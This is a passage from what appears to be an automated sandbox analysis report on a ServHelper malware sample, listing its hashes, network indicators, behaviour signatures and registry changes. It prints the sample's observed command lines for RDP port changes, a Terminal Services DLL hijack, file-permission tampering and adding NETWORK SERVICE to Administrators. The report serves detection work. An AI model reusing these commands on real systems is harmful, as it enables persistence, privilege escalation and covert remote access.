| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| PL | 185.244.30.28:4898 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs
| MD5 | 4c3b08d7af0401a66aa7934a5f533276 |
| SHA1 | b5638475f3422d083a825a88a753db5e05666923 |
| SHA256 | 59f8fbd0ff79380d28c47847b14b846dd52ff36b00a08690c4cf5292b8dc5dc4 |
| SHA512 | 5497a31e5d47d2baa3bc43b6677fd8f35b55ed79e25bb831f5ee7c48c32e9aed9323a9b8d96dfc7ebe6ca3d3964f2d85ebaa2203a25b4b142ef2334542d87a0f |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_for1a5p4.chx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
151s
Command Line
Signatures
ServHelper
Servhelper family
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: Network Share Connection Removal
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | C:\Windows\system32\reg.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wyobeegv.2jk.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIAD92.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIADB3.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIADC4.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIADD4.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rr1w3eym.2gg.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIADA3.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\shellbrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Permission Groups Discovery: Local Groups
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\icacls.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
"C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kkn2vpbm\kkn2vpbm.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES81BF.tmp" "c:\Users\Admin\AppData\Local\Temp\kkn2vpbm\CSCE6608685DB46447B9E103BC3DF145243.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
C:\Windows\system32\cmd.exe
